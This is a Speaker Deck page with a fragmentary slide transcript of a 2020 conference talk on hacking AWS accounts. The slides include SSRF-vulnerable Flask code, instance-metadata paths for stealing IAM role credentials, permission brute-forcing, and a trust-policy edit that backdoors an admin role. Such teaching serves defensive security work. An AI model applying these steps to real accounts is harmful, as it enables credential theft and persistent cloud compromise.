Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Step by step AWS Cloud Hacking
Search
andresriancho
September 25, 2020
Technology
0
620
Step by step AWS Cloud Hacking
andresriancho
September 25, 2020
Tweet
Share
More Decks by andresriancho
See All by andresriancho
Step by step AWS Cloud Hacking
andresriancho
2
2.9k
Internet-Scale analysis of AWS Cognito Security
andresriancho
1
12k
Threat Modelling
andresriancho
0
1.4k
Automated Security Analysis AWS Clouds
andresriancho
1
3.2k
Injecting into URLs / Breaking URL-Encoding
andresriancho
0
250
Galería de Fallos en Unicornios
andresriancho
1
240
Esoteric Web Application Vulnerabilities
andresriancho
0
1.1k
String Compare Timing Attacks
andresriancho
0
590
Timing Attacks
andresriancho
1
340
Other Decks in Technology
See All in Technology
Zephyr(RTOS)にEdge AIを組み込んでみた話
iotengineer22
1
340
可観測性は開発環境から、開発環境にもオブザーバビリティ導入のススメ
layerx
PRO
0
260
RemoteFunctionを使ったコロケーション
mkazutaka
1
110
IBC 2025 動画技術関連レポート / IBC 2025 Report
cyberagentdevelopers
PRO
2
140
Biz職でもDifyでできる! 「触らないAIワークフロー」を実現する方法
igarashikana
7
3.3k
事業開発におけるDify活用事例
kentarofujii
5
1.4k
JSConf JPのwebsiteをGatsbyからNext.jsに移行した話 - Next.jsの多言語静的サイトと課題
leko
2
180
クラウドとリアルの融合により、製造業はどう変わるのか?〜クラスメソッドの製造業への取組と共に〜
hamadakoji
0
420
Building a cloud native business on open source
lizrice
0
180
Open Table Format (OTF) が必要になった背景とその機能 (2025.10.28)
simosako
1
170
Dify on AWS 環境構築手順
yosse95ai
0
130
From Natural Language to K8s Operations: The MCP Architecture and Practice of kubectl-ai
appleboy
0
210
Featured
See All Featured
Why You Should Never Use an ORM
jnunemaker
PRO
59
9.6k
Large-scale JavaScript Application Architecture
addyosmani
514
110k
How to Ace a Technical Interview
jacobian
280
24k
Bash Introduction
62gerente
615
210k
Product Roadmaps are Hard
iamctodd
PRO
55
11k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
30
2.9k
Building a Scalable Design System with Sketch
lauravandoore
463
33k
jQuery: Nuts, Bolts and Bling
dougneiner
65
7.9k
Automating Front-end Workflow
addyosmani
1371
200k
Docker and Python
trallard
46
3.6k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
508
140k
The Language of Interfaces
destraynor
162
25k
Transcript
Ekoparty 2020 Andrés Riancho
2
3
None
5
need credentials • • • 6
7
IAM permissions 8
9 http://169.254.169.254/ /latest/meta-data/iam/security-credentials/ /latest/meta-data/iam/security-credentials/{role-name}
10
11 from urllib.request import urlopen from flask import request @app.route('/ssrf')
def handler(): url = request.args.get('url') return urlopen(url).read()
Instance metadata and S3 compromise
13
None
two ways to enumerate permissions IAM service In most cases
this will fail brute-force 15
Get* / List* / Describe* DryRun parameter 16
17 SUPPORTED_SERVICES = [ 'ec2', 's3' ]
18
./enumerate-iam.py
20
many things the attacker doesn't know. 21 { "Statement":[ {
"Effect":"Allow", "Action":[ "s3:*", "lambda:*", "..." ], "Resource":"*" } ] }
try to elevate privileges to a principal with full access
22 { "Statement":[ { "Effect":"Allow", "Action":[ "*", ], "Resource": "*" } ] }
Lambda function will have access to the IAM role 23
Getting * on *
None
existing trust policy in the AdminRole 26
27
28 { "Effect": "Allow", "Principal": { "AWS": "arn:aws:iam::925877178748:root" }, "Action":
"sts:AssumeRole" } { "Effect": "Allow", "Principal": { "AWS": ["arn:aws:iam::925877178748:root", "arn:aws:iam::320222540496:root"] }, "Action": "sts:AssumeRole" }
Never trust the trust policy
30 ARN for the backdoored role
None
32 most resources in the AWS account VPC is completely
isolated from the Internet
None
34 VPN between the attacker's workstation and a VPC
35
vpc-vpn-pivot
None
From zero to full pwn
None
40 • enumerate-iam • pacu • vpc-vpn-pivot Follow @AndresRiancho
None